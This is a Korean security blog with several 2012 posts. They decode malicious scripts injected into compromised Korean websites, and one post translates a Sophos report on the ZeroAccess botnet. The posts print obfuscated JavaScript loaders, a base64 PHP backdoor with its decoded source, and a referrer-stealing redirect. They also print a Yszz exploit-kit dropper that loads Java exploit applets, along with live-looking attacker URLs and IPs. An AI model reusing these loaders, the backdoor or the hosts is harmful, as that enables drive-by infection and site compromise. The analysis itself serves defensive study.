원본 위치 : http://it.choongang.co.kr/curri/curri_week.asp?m=2


스크립트내에 두가지 스크립트가 존재한다 !


</script>

</body>

</html><textarea id="uxi" style="display:none;">717a766078707b613b62677c[생략]5b372e</textarea><script>sgon="var wkoder = 'Stri'+'ng.f'+'rom'+'Char'+'Code'; wkoder2 = '78'; function fs(){bah=eval('Ma'+'t'+'h.P'+'I');mg=eval('p'+'arseI'+'nt');qcsjh='le'+'ng'+'th';mjeal=mg(~((bah&bah)|(~bah&bah)&(bah&~bah)|(~bah&~bah)));ybr=mg(((mjeal&mjeal)|(~mjeal&mjeal)&(mjeal&~mjeal)|(~mjeal&~mjeal))&1);sehihn=ybr<<ybr;flh=mjeal;flh=mjeal;lma='';teyrh=eval(wkoder);egxf=eval;for(uxsasv=mjeal;uxsasv<sgon[qcsjh];uxsasv-=-ybr)flh+=eval('sgon.ch'+'arCod'+'eA'+'t(uxsasv)');flh%=[생략](1<<6)));for(uxsasv=mjeal;uxsasv<document.getElementById('uxi').value[qcsjh];uxsasv+=sehihn)lma+=teyrh(mg(mjeal+unescape('%'+wkoder2)+document.getElementById('uxi').value.charAt(uxsasv)+document.getElementById('uxi').value.charAt(uxsasv+mg(ybr)))^flh);try{egxf(lma);}catch(e){try{eval(lma);}catch(e) {window.location='/';}}}try{eval('fs();')}catch(e) {alert('e'+'rr');}";eval(sgon);</script>


eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0K

JGxpbmtzID0gbmV3IEdldExpbmtzKCk7DQoNCmVjaG8gJGxpbmtzLT5MaW5rczs

NCmNsYXNzIEdldEpbmtzDQp7DQoJdmFyICRob3N0ID0gImVzbGkudHciOw0KC

XZhciAk[생략]wYWdlID0gZXhwbG9kZSgiXHJcblxyXG4iLCAkYnV

mZik7DQogIAkJCXJldHVybiAkcGFnZVsxXTsNCiAgICB9DQoJfQ0KfQ=='));?>



먼저 BASE64 코드로 만들어진 스크립트를 디코딩시 !


PHP 쉘로 변환이 됩니다!


자세히는 모르지만 PHP 쉘로 Backdoor의 역활을 하는거 같습니다!


error_reporting(0);

$links = new GetLinks();


echo $links->Links;

class GetLinks

{

var $host = "esli.tw";

var $path = "/link.php?site=";

var $site = "";

var $user_agent = "";


var $Links = "";



var $_socket_timeout    = 12;

var $_cashe_life_time    = 3600;

var $_cashe_file    = "cashe.txt";


function GetLinks()

{

if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {


$this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];

$this->user_agent = $_SERVER['HTTP_USER_AGENT'];

$this->Links = $this->fetch_remote_file();

if ($handle = fopen($this->_cashe_file, 'w')) {

fwrite($handle, $this->Links);

}

                        [생략]

fclose($handle);

}

else {

$this->Links = file_get_contents($this->_cashe_file);

}

}


function fetch_remote_file()

{

 $buff = '';

    $fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);

    if (!$fp) {


    } else {

        $out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";

        $out .= "Host: {$this->host}\r\n";

        $out .= "Connection: Close\r\n\r\n";

    

        fwrite($fp, $out);

        while (!feof($fp)) {

            $buff .= fgets($fp, 128);

        }

        fclose($fp);

  $page = explode("\r\n\r\n", $buff);

  return $page[1];

    }

}

}


위에있는 첫번째 코드는 디코딩시 !


http://today-newday.cn/in.cgi?6&amp;parameter=newday


=========================

Server IP(s):

0.0.0.0

=========================


연결을 하지만 현재는 페이지가 죽어 있는 상태입니다!


댓글을 달아 주세요

posted by Kwan's 2012. 10. 16. 20:08

원본 위치 : http://kjclsb.buy3d.co.kr/style.css.js


document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%[생략]68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631mbohvbhf[생략]%60vs%264C%261E%261B%264D0tdsjqu%264F1')


<html>

<head>

</head>

<body>

<textarea rows="200" cols = "100" id='df'></textarea>

<script language=javascript>

function dF(s)

 {

   var s1=unescape(s.substr(0,s.length-1));

   var t='';

   for(i=0;

   i<s1.length;

   i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));

document.getElementById('df').value = unescape(t);

}

 dF('&4Dtdsjqu&31mbohvbhf&4E[생략]8D&8D&310ebvn0/uftu&39x``us&3:&31&8D&8D&310hpphmf0/uftu&39x``us&3:&3:&31mpdbujpo/isfg&4E&31x``vs&4C&1E&1B&4D0tdsjqu&4F1');

</script>


디코딩!


<script language="JavaScript">

var w__tr=encodeURIComponent(document.referrer);

var w__hr=encodeURIComponent(location.href);

var w__ur="http://nayas.cafe24.com/?r=" + w__tr + "&refe=" + w__hr;

if(/naver/.test(w__tr) || /nate/.test(w__tr)  || /yahoo/.test(w__tr)  || /daum/.test(w__tr) || /google/.test(w__tr)) location.href= w__ur;

</script>


textarea 태그 이용하는 방법도 괜찮은거 같다! 다양한 방법을 연구해봐야겠다!!!!

몇번 안해봐서 꽤 걸린거 같은데 구글도 찾아보고 네이버도 찾아봐서 이렇게 나오니 뿌듯하다!

document.getElementById 이것이 나의 구세주!


댓글을 달아 주세요

  1. madwind 2012.10.17 09:57  Addr  Edit/Del  Reply

    이런 코드도 있내요..
    해당 스크립트가 실행되면 접속되는 곳이 404 페이지 에러가 나서 아쉽습니다...

    • Kwan's 2012.10.17 18:48 신고  Addr  Edit/Del

      오랜만에 신선한것을 봤는데... 너무 늦게 발견한거 같아요!ㅠ
      저도 이런 코드 처음봐서 그런지 막막하더라고요 ㅠㅠㅠ

  2. 1cesp 2012.11.09 01:32  Addr  Edit/Del  Reply

    해당블로그는 티스토리 블로그구요 사진은 구글블로그에서 가져오네요

posted by Kwan's 2012. 10. 6. 14:09

발견지 : http://www.icross.co.kr/

            →http://festival.cocobau.com/adm_site/e_show/e_th_ad.js

               →http://205.164.25.146/pic/img.js

               →http://205.164.25.146/pic/img.html (Yszz 1.5 vip)

                   → http://205.164.25.146/pic/swfobject.js

                   → http://205.164.25.146/pic/jpg.js

               →http://205.164.25.146/pic/css.html



var K4Er = "%";

var MDIxo=K4Er+"78"+K4Er+"6F";

var OIai8=K4Er+"78"+K4Er+"6F"+K4Er+"31";

var HHYWv=K4Er+"31"+"%59"+"%53";

var CvXWz="%7A"+"%7A"+"%31";

var JZyjl="%31"+"%6F"+"%78";

var ERb7H="%6F"+"%78";

var XGpwn2 =중략/

oI0Nl6jI2jrBT1pk+oIDWqCs=",HUx2Ydz="%64"+"

%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",

sac5pxhFS="%77"+"%72"+"%69"+"%74"+"%65",ubo8KLEZHIPX2;

var kxin1s = "%53"+"%74"+"%72";

var B83pNx = kxin1s+"%69"+"%6e"+"%67";

var kxin2s = "%66"+"%72"+"%6f";

var kxin3s = "%6d"+"%43"+"%68";

var kxin4s = "%61"+"%72"+"%43";

var kxin5s = "%6f"+"%64"+"%65";

var WjuQFO = kxin2s+kxin3s+kxin4s+kxin5s;

var fxTmFiR = AVgHbu2f(B83pNx);

var xZW9RVt = AVgHbu2f(WjuQFO);

var sATWUn = "%41"+"%72"+"%72"+"%61"+"%79";

var x83QqGV = AVgHbu2f(sATWUn);

var SnDN8 = "%73"+"%74"+"%72";

var Z0b9A = "%63"+"%68"+"%61"+"%72"+"%43"+"%6f"+"%64"+"%65"+"%41"+"%74";

var fkPj5 = AVgHbu2f(SnDN8);

var hyYQ8 = AVgHbu2f(Z0b9A);

function tzWmUni(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=fkPj5[hyYQ8](i++);switch(c>>4)

{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=fkPj5[hyYQ8](i++);char3=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}

return out.join('');}

var ZjykejU6Chars=new window[x83QqGV](-1,-1,-1,-중략--1,-1,-1);

HUx2Ydz=AVgHbu2f(HUx2Ydz);

function ZjykejU6(str)

{var YS1,YS2,YS3,YS4;/*Yszz 1.5 vip*/var i,len,out;

len=str.length;i=0;out = "";

while(i<len)

{do{YS1=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS1==-1);

if(YS1==-1)

break;do{YS2=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS2==-1);

if(YS2==-1)

break;out+=window[fxTmFiR][xZW9RVt]((YS1<<2)|((YS2&0x30)>>4));

do{YS3=str.charCodeAt(i++)&0xff;if(YS3==61)

return out;

YS3=ZjykejU6Chars[YS3]}while(i<len&&YS3==-1);

if(YS3==-1)

break;out+=window[fxTmFiR][xZW9RVt](((YS2&0XF)<<4)|((YS3&0x3C)>>2));

do{YS4=str.charCodeAt(i++)&0xff;if(YS4==61)

return out;YS4=ZjykejU6Chars[YS4]}while(i<len&&YS4==-1);if(YS4==-1)

break;out+=window[fxTmFiR][xZW9RVt](((YS3&0x03)<<6)|YS4)}

return out}

function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)

{v[i]=window[fxTmFiR][xZW9RVt](v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}

if(w){return v.join('').substring(0,sl);}

else{return v.join('');}}

function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)

{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}

if(w){v[v.length]=len;}

return v;}

ubo8KLEZHIPX2=AVgHbu2f(XGpwn2);

function kaixin(str,Udkz){if(str==""){return"";}

var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}

z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}

return long2str(v,true);}

sac5pxhFS=AVgHbu2f(sac5pxhFS);

JS0W=Cn6T4bG0znIi;

JS0W=tzWmUni(kaixin(ZjykejU6(JS0W), ubo8KLEZHIPX2));

window[HUx2Ydz][sac5pxhFS](JS0W);


[생략]


   {

     var kaixin=document.createElement('applet');

     kaixin.width="1";

     kaixin.height="1";

     if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031))

     {

       kaixin.archive="6UXSEJgm.jpg";

       kaixin.code="GondadGondadExp.class";

       kaixin.setAttribute("dota","http://69.46.87.99/img/jpg.css");

       document.body.appendChild(kaixin);

     }

     else if ((kaixinm<=17003 && kaixinm>=17000) || (kaixinm<=16032 && kaixinm>=16000) ||(kaixinm>=15035 && kaixinm<=15000))

     {

       kaixin.archive="pvoszTc.jpg";

       kaixin.code="gond1723.Gondattack.class";

       kaixin.setAttribute("xiaomaolv","http://69.46.87.99/img/jpg.css");

       kaixin.setAttribute("bn","woyouyizhixiaomaolv");

       kaixin.setAttribute("si","conglaiyebuqi");

       kaixin.setAttribute("bs","748");

       document.body.appendChild(kaixin);

     }

     else

     {

       var ques3 = window.navigator.userAgent.toLowerCase();

       if (ques3.indexOf("msie 6") > -1)

       {

         ...cument.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://69.46.87.99/img/jpg.css'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'DB6Jm.jpg'></OBJECT>");

       }

       else

       {

         생략


         kaixiny.archive = "DB6Jm.jpg";

         kaixiny.code = "cve2012xxxx.Gondvv.class";

         kaixiny.setAttribute("xiaomaolv", "http://69.46.87.99/img/jpg.css");

         kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");

         kaixiny.setAttribute("si", "conglaiyebuqi");

         kaixiny.setAttribute("bs", "748");

         document.body.appendChild(kaixiny);

         

       }

       

     }

     

   }

   else

   {

     var pcss=navigator.userAgent.toLowerCase();

     var UaYcKzD2 = window.navigator.userAgent.toLowerCase();

     if ((UaYcKzD2.indexOf('msie 8.0') > -1))

     {

       document.writeln("<iframe src=T0HE3R.html><\/iframe>");

       

     }

     else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))

     {

       document.writeln("<iframe src=6cxyl.html><\/iframe>");

       

     }

     

   }

   

 }


버전이 올라가면서 바뀌는 줄 알았는데 별달리 바뀐게 없는거 같이 느껴 졌다.

디코딩 했을때 역시 msie 버전 체크하는건 요새는 버전에 따라서 다시 연결되는게 대세인거 같다!

yszz 도 공다팩의 다동 처럼 어떤식으로 우회할지 조금 더 지켜봐야겠다!


댓글을 달아 주세요

  1. 도움이 절실한.. 2013.08.01 18:16  Addr  Edit/Del  Reply

    안녕하세요..ㅠ
    좋은자료 감사합니다.
    질문하나만 해도될까요? ㅠ;;
    디코딩 결과를 어떻게 출력한건지 궁금합니다.
    alert 해서 JS0W를 확인하면 되는거죠?
    근데,, 부분이 짤려서 전체를 확인할수가 없어서요 ㅠ

posted by Kwan's 2012. 10. 3. 13:56


감염 페이지 : http://www.jjanglive.com/upload/list.txt



현재 짱라이브 내에 비정상적이 페이지에서 악성코드가 유포중에 있습니다 !

메인 페이지로 접속할때는 감염이 안되지만 이 특정 링크를 통해 접속 하실 경우 감염이 됨을 알려 드립니다 !


list.txt 내에 현재 코드는 !


051049058104116116112058047047107111114101097046102111114

103101116109101050046105110102111047116101109112047108103108046103105102


이거 한줄로 되어있습니다.

3개씩 짤라서 아스키코드표와 대조해 본다면 쉽게 찾을 수 있습니다 !


051,049,058,104,116,116,112,058,047,047,107,111,114,101,097,046,102,

111,114,103,101,116,109,101,050,046,105,110,102,111,047,116,101,109,

112,047,108,103,108,046,103,105,102


-----------------------------------------------------------------------------------------------


최종파일 : http://korea.forgetme2.info/temp/lgl.gif


예전에도 보고된 적이 있는곳에서 계속 악용되고 있으니 다시한번 점검이 필요한듯 싶습니다.


댓글을 달아 주세요

  1. madwind 2012.10.04 12:26  Addr  Edit/Del  Reply

    좋은 정보 감사합니다...

posted by Kwan's 2012. 10. 2. 18:19


9백만 대 이상의 PC 감염 - 제로액세스 봇넷 무방비

제로액세스(ZeroAccess)는 수년간 개인과 기업들을 괴롭혀온 엄청나게 널리 퍼진 맬웨어입니다. 이 맬웨어는 Windows의 새로운 아키텍쳐나 버전에 맞춰 발전해 왔습니다.

소포스랩에서 우리는 더 많은 맬웨어를 다운로드하기 위한 명령을 받을 수 있는 P2P 봇넷을 희생 PC들에게 추가하면서 어떻게 제로액세스가 그 희생 PC들을 예속시키는 지 설명하면서, 제로액세스 루트킷의 이전 화신에 대해 깊이 있게 살펴보았습니다.

가장 최근에, 소포스 연구원들은 제로액세스가 완전히 사용자모드 메모리로 작동하면서, 어떻게 전략에 있어서의 주요 변화를 취했는지 파헤쳤습니다.

이런 맬웨어 계열의 계속된 하이 프로파일 때문에, 우리는 제로액세스의 최신 버전뿐만 아니라 제로액세스 봇넷 전체에 대해서 더욱 더 자세하게 그 위협을 검사해야 할 필요를 느꼈습니다.

소포스랩 연구원들은 제로액세스의 최신 버전이 현재 활성화된 감염 PC 약 100만 대를 포함하여 900만 대 이상의 컴퓨터에 설치되었다는 것을 알아내었습니다.

제로액세스는 봇넷 소유자에게 이윤을 창출시키도록 설계된 다양한 일을 수행하는 플러그인 파일을 다운로드 하도록 P2P 네트워크를 사용합니다. 우리 연구원들은 피어(peer)가 전세계 어디에 위치해 있는지, 봇넷이 다운로드 하도록 지시 받고 있는 파일의 종류가 무엇인지 알아내기 위해 2 개월이란 기간 동안 이 네트워크를 모니터링 했습니다.

감염된 컴퓨터들을 세계지도에서 점으로 표시했을 때 볼 수 있듯이, 우리는 키리바시(Kiribati)의 조그만 섬나라에서부터 부탄(Butan)의 히말라야 왕국(Himalayan Kingdom)에 이르기까지 전체 198개국으로부터 감염된 컴퓨터의 IP주소를 알아내었습니다.

가장 많은 수의 감염된 컴퓨터가 미국, 캐나다, 서유럽에서 발견되었습니다.

우리는 제로액세스 봇넷이 최근에는 클릭사기(Click fraud)와 비트코인(Bitcoin) 채굴(mining) 2가지 주요 목적으로 사용되고 있다는 것을 연구를 통해 알아내었습니다.

만약 제로액세스 봇넷이 최대한도로 동작한다면, 하루에 10만 달러 이상의 어마 어마한 돈을 긁어 모을 수 있습니다.

우리는 또 제로액세스 소유자들이 봇넷을 예의주시하게 함으로써 그 메커니즘을 역설계(reverse-engineered)했었고, 콜홈(call-home) 네트워크 통신을 합법적으로 보이는 트래픽에 묻히도록 설계하는데 이용했던 다수의 테크닉들을 발견했습니다.

여러분은 '제로액세스 봇넷 - 엄청난 금전적 이익을 위한 채굴과 사기(The ZeroAccess Botnet - Mining and fraud for massive financial gain)'이라는 우리의 새로운 기술문서에서 제로액세스에 대해 더 많은 것을 발견할 수 있습니다.

댓글을 달아 주세요